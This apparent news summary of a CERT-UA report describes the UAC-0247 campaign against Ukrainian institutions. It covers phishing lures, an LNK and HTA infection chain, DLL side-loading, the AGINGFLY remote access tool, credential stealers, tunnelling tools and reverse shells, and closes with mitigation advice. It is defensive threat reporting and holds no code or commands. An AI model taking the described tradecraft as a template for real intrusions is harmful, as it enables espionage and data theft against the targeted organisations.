UAC-0247 Targets Ukrainian Institutions
Since early 2026, a threat group identified as UAC-0247 has been executing a cyber campaign aimed at Ukrainian governmental bodies and healthcare facilities, including hospitals and emergency services. This campaign is characterized by the extraction of sensitive information from web browsers and WhatsApp, while the attackers stealthily navigate compromised systems to broaden their infiltration.
Deceptive Tactics in Cyber Attacks
The campaign initiates with a cleverly disguised email, masquerading as a discussion about humanitarian aid. The email entices the recipient to click on a link. The attacker may either fabricate a fake website using AI tools or exploit Cross-Site Scripting (XSS) vulnerabilities on legitimate sites to deceive the victim. Clicking the link results in downloading an archive file onto the victim’s device.
Upon opening the archive, a shortcut file is activated, which utilizes a standard HTA file processing tool to pull and execute a remote HTA file. This distraction allows a background process to deploy and execute a malicious file through a scheduled task, unbeknownst to the victim.
Tools and Techniques Used by Attackers
CERT-UA analysts have linked this wave of attacks to intensified cyber activity observed in March and April 2026. The UAC-0247 group also targeted Ukrainian Defense Forces and FPV drone operators. In a documented incident on March 10, 2026, an archive named “bachu.zip” was distributed via the Signal messenger, falsely appearing as an update for the “BACHU” software used by FPV operators. The archive contained a DLL file that launched the AGINGFLY malware using a DLL side-loading method.
Investigations revealed a consistent modus operandi of data theft and network probing. CHROMELEVATOR was used to extract authentication details from browsers, while ZAPIXDESK targeted WhatsApp data. Additionally, subnet scanners and the RUSTSCAN tool were employed to map internal networks, and tools like LIGOLO-NG and CHISEL established covert network tunnels. In one case, the XMRIG miner was found concealed in a patched version of the WIREGUARD program.
Insights into AGINGFLY Malware
The AGINGFLY malware, written in C#, serves as the primary remote access tool for this campaign. It enables attackers to execute commands, download files, capture screenshots, activate keyloggers, and execute in-memory code remotely. Unlike similar tools, AGINGFLY’s command handlers are dynamically downloaded from a C2 server, compiled in real-time within the infected system. Communication with the C2 server is secured via web sockets, using AES-CBC encryption.
For sustained access, the attackers deploy a PowerShell script named SILENTLOOP, which autonomously runs commands, updates configurations, and retrieves the latest C2 server IP from a Telegram channel. If the primary source fails, it uses alternative methods to locate the C2 address. Initial access is achieved using a TCP reverse shell or RAVENSHELL, establishing an encrypted TCP connection with a 9-byte XOR key and communicating with the management server via CMD.
Strategies for Defense and Mitigation
CERT-UA advises organizations to mitigate exposure by restricting the execution of files like LNK, HTA, and JS on endpoint systems. It also recommends limiting the use of utilities such as mshta.exe, powershell.exe, and wscript.exe, which are exploited in this campaign. These measures align with standard practices for reducing attack surfaces and can be implemented without third-party tools.
For further updates and insights, follow us on Google News, LinkedIn, and X, and set CSN as a preferred source in Google.
